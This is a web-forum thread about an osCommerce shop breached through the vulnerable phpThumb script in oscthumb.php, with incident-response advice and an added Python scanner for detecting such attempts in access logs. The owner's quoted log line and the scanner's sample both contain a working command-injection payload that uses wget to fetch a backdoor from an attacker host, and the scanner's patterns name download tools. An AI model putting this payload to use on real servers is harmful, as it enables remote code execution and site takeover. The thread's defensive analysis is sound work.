
altoid

indeks.php and indeks.php1


this morning site monitor on a 2.2 shop of mine showed two new files...indeks.php and indeks.php1

they were put there sometime since yesterday am and when the site monitor cron ran this am.

they were located in the root/public_html folder, same level as index.php

the files showed base64 code within and upon converting, it had something to do with email hacking or so it appears to me.

all else seems fine on that shop.

i deleted those files

googling their names didn't give me much info.

does any one know anything about these files etc. just curious.

thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.


@@altoid

Secure your site! Your server, change all usernames and passwords.

Chris

:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)


In many cases, those files appear via a server-wide hack (i.e. a backdoor script such as this is dropped in the root of every site on a server). Contact your web service provider and ask them whether their servers have been compromised recently. Many providers keep a tight lip on these issues and prefer to lay the blame with the user.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


@@DunWeb

Thanks Chris...changed admin user name / pwd but due to a "front page" extension issue the admin folder password protection is a problem...the host is working on that.

first time ever this shop has been compromised...it's an older 2.2 shop and really needs to be brought up to 2.3.3. i just need to tackle that and get a more secure php version to cover it.

@@Taipo

the host says negative on server-wide issues, but they did have a huge nasty server-wide issue a couple years back changing all the index files to a hacked file.

thanks



@@altoid FrontPage extensions are no longer supported by Microsoft so any security issues will not be fixed. You should ask your host to remove that option. The reason you can't change the password is probably because cPanel, assuming that is what your host uses, won't let you do that if it sees something to do with FrontPage in the .htaccess file. If you delete such entries, it should work. You can then add them back in if needed.

For the index files, if it is not too late, you can look in the server's ftp log to get the IP of whoever uploaded those. Your host may have to provide the log if you don't have access to it.


@@Jack_mcs

Jack, the particular snafu with MS FrontPage extensions, on my host anyway, is that they would not remove via the CP, nor my VPS WHM panels. Tech support had to do the removal and they just finished up, so now I can work with the protected folders in the 2.2 shops.

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of a button or two.

Thanks



@@Jack_mcs

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of a button or two.

LOL.


reviewing the log file...the first instance of indeks.php is this:

41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"

then later in the log there are 6 instances of

GET /indeks.php from the same ip

which has now been banned from my site

so my question is what is the oscthumb involvement here?


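As an added detection example (not code from this thread, from osCommerce or from phpThumb), the script below scans Apache combined-format access log lines for the pattern in the post above: a request to a *thumb.php script whose fltr[] parameter carries a shell command separator or a download tool, followed by any later request for the file that command fetched. The sample log is constructed from the one line quoted in the post plus two made-up lines; the second client address 198.51.100.7 is a documentation placeholder.

```python
import re
from urllib.parse import unquote
# Apache "combined" log line: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
# '|' is phpThumb's own filter separator; ';', backticks, '$' and download tools never belong in one.
INJECT_RE = re.compile(r'[;`$]|\b(?:wget|curl|fetch)\b', re.I)
DROP_RE = re.compile(r'\b(?:wget|curl)\s+(?:https?://)?\S*?/([^/\s;]+)', re.I)  # name of the fetched file

def parse_query(query):
    """Decode 'a=1&b[]=x' into (key, value) pairs; deliberately never splits on ';'."""
    pairs = []
    for part in filter(None, query.split('&')):
        key, _, value = part.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs

def check_line(line):
    """Return a finding for a phpThumb fltr[] injection attempt in one log line, else None."""
    m = LOG_RE.match(line)
    path, _, query = m.group('target').partition('?') if m else ('', '', '')
    if not path.lower().endswith('thumb.php'):
        return None
    for key, value in parse_query(query):
        if key.startswith('fltr') and INJECT_RE.search(value):
            drop = DROP_RE.search(value)
            return {'ip': m.group('ip'), 'time': m.group('time'), 'filter': value,
                    'dropped': drop.group(1) if drop else None}
    return None

def scan_log(lines):
    """Flag injection attempts, then every later request for a file they dropped."""
    findings, dropped = [], set()
    for line in lines:
        hit = check_line(line)
        if hit:
            findings.append(('injection', hit))
            if hit['dropped']:
                dropped.add('/' + hit['dropped'])
            continue
        m = LOG_RE.match(line)
        if m and m.group('target').partition('?')[0] in dropped:
            findings.append(('dropped_file_request', {'ip': m.group('ip'), 'time': m.group('time')}))
    return findings

# Constructed sample: the request quoted in the thread, a later fetch of the dropped file, and a benign request.
SAMPLE_LOG = [
    '41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0"',
    '41.151.224.2 - - [28/Apr/2013:18:40:01 -0400] "GET /indeks.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Apr/2013:18:41:10 -0400] "GET /oscthumb.php?src=images/482.jpg&w=120 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
]
```

Run scan_log over a real access log (one line per element) and the result lists the injecting IP, the decoded filter string and the dropped file name, then every request that hit that file afterwards.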

Is file.jpg a real image? Maybe the hacker uploaded that file at some point and it has hacker code in it. You may also want to look in the Path Tracker report for that IP and see what he was doing. It might show something.


@@Jack_mcs

path tracker for that ip showed this:

2013-04-28 18:37:59 product_info.php products_id=482

pid 482 is a legit product in the shop.

searching site...no file.jpg

looking here: http://labs.sucuri.net/?details=picasa.com.playteck.net

i find:

Details for the domain picasa.com.playteck.net

URLs and sub domains distributing the malware or acting as a redirector:

Blacklist status

Blacklist status for picasa.com.playteck.net: http://labs.sucuri.net/?blacklist=picasa.com.playteck.net

IP address information

Domain picasa.com.playteck.net is at: 67.55.40.35 (67.55.40.35)

ip info for that is:

IP address : 67.55.40.35
Country : CA
State/Province : ONTARIO
City : MISSISSAUGA
Zip or postal code : L4X 2Z3

i ran a site scan using sucuri.net and it came back clean.

same test through comodo came back clean



Interesting. I wonder if oscthumb is vulnerable ?


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here


@@burt

i'm running rob's kiss thumbnailer on my 2.3.3 shops .... which is where this 2.2 shop is headed.



@@altoid

@@burt

It looks like oscthumb runs phpThumb which is vulnerable.

This looks like what Steve posted from the exploit on his site:

http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

I haven't tested this version but they are claiming it is updated to a more secure version of phpThumb: http://addons.oscommerce.com/info/5491

Matt


@@mattjt83

Thanks Matt, I wasn't aware of that add on to address the vulnerability issue.

I am going to try that on an existing 2.2 shop, and then for another shop upgrade I opted to go with Robert's KISS Thumb add on.

